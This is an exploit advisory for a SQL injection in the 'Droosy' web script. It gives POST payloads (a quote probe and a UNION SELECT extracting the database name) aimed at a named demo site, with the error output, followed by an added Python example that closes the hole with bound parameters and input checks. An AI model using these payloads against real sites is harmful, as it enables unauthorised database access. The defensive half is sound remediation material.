# Name Of Script : Droosy Version 1,0
# Company Site : http://www.emides.com/our_scripts.emi?id=14
# Demo : http://ad.ae/droosy/
# Found By : RoMaNcYxHaCkEr
# Contact With Me : rxh0@hotmail.com
# My Group : Security - Codes
# My Homepage : WwW.Sec-Code.CoM
# Type Of Exploit : Remote SQL Injection By [POST Method]
# Video Explanation Of This Exploit, Download Here : http://www.mediafire.com/?zgtjzmznwd2
# Author Has No Responsibility Over The Damage You Do With This! It's Just For Educational Purposes :)
==================================================================================================================
# P.O.C :
The Vulnerability Is In The Cat Variable In The Main Index, But The Script Is A Demo, So We Try To Work Out The Variables Of Some Files, And Mod_Rewrite Makes Them A Problem To Identify ...
The Problem, If You See The Video, Is In The Cats Variable, Not In The Search Box ....
Here The Result Of Search :
http://ad.ae/droosy/result.html
Copy And Post These Variables If You Have A Specific Tool For The POST Method, Like In The Video If You See It :) :
linkname=rxh&cats='&B1=%C5%C8%CD%CB
So We See The Error :
يبدو أن هنالك خطأ في قاعدة البيانات
الخطأ هو : تم تنفيذ عبارة SQL خاطئة
قاعدة البيانات قامت بإرجاع المعلومات التالية عن الخطأ :You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
رقم الخطأ الذي أعادته قاعدة البيانات: 1064
So Let's Apply This :
linkname=rxh&cats='/**/union/**/select/**/0,1,database(),3,4,5,6/*&B1=%C5%C8%CD%CB
And See The Name Of Database :
adminad_droos
So Continue Your Work ... :)
==================================================================================================================
# Solution :
Contact With Me I Will Filter This Fucking Uses :)
# rXh
# bEST wISHES
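
The filtering that the Solution section mentions, as an added example (not code from Droosy or from the advisory's author): the `cats` value is checked against an allow-list, passed to the database as a bound parameter, and database error text is never returned to the client. Python's `sqlite3` stands in for the script's MySQL backend; the `links` table, the function names and the idea that `cats` is a numeric category id are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    """Constructed stand-in table (7 columns, like the page's UNION test)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE links (id INTEGER, cat INTEGER, name TEXT, "
               "url TEXT, c4 TEXT, c5 TEXT, c6 TEXT)")
    db.executemany("INSERT INTO links VALUES (?,?,?,?,?,?,?)", [
        (1, 2, "lesson one", "/l/1", "", "", ""),
        (2, 2, "lesson two", "/l/2", "", "", ""),
        (3, 5, "other", "/l/3", "", "", ""),
    ])
    return db

def find_links(db, cat, linkname):
    """Values travel as bound parameters, never as part of the SQL text."""
    sql = ("SELECT id, name FROM links "
           "WHERE cat = ? AND name LIKE ? ORDER BY id")
    return db.execute(sql, (cat, "%" + linkname + "%")).fetchall()

def handle_search(db, post_body):
    """Return (http_status, rows) for a raw POST body."""
    form = parse_qs(post_body, keep_blank_values=True, encoding="cp1256")
    linkname = form.get("linkname", [""])[0]
    cats = form.get("cats", [""])[0]
    # Allow-list check: assumed here that a category id is 1-9 ASCII digits.
    if not (cats.isascii() and cats.isdigit() and len(cats) <= 9):
        return 400, []
    try:
        return 200, find_links(db, int(cats), linkname)
    except sqlite3.Error:
        # Log the detail server-side; the client gets no database error text.
        return 500, []

# The two request bodies shown on the page, plus one constructed normal request.
PROBE = "linkname=rxh&cats='&B1=%C5%C8%CD%CB"
UNION = ("linkname=rxh&cats='/**/union/**/select/**/0,1,database(),3,4,5,6/*"
         "&B1=%C5%C8%CD%CB")
NORMAL = "linkname=lesson&cats=2&B1=%C5%C8%CD%CB"

if __name__ == "__main__":
    db = make_db()
    for body in (PROBE, UNION, NORMAL):
        print(handle_search(db, body))
```

Binding alone already keeps the page's `cats` value out of the SQL text; the allow-list and the generic error response remove the syntax-error message that the P.O.C relies on to confirm the flaw.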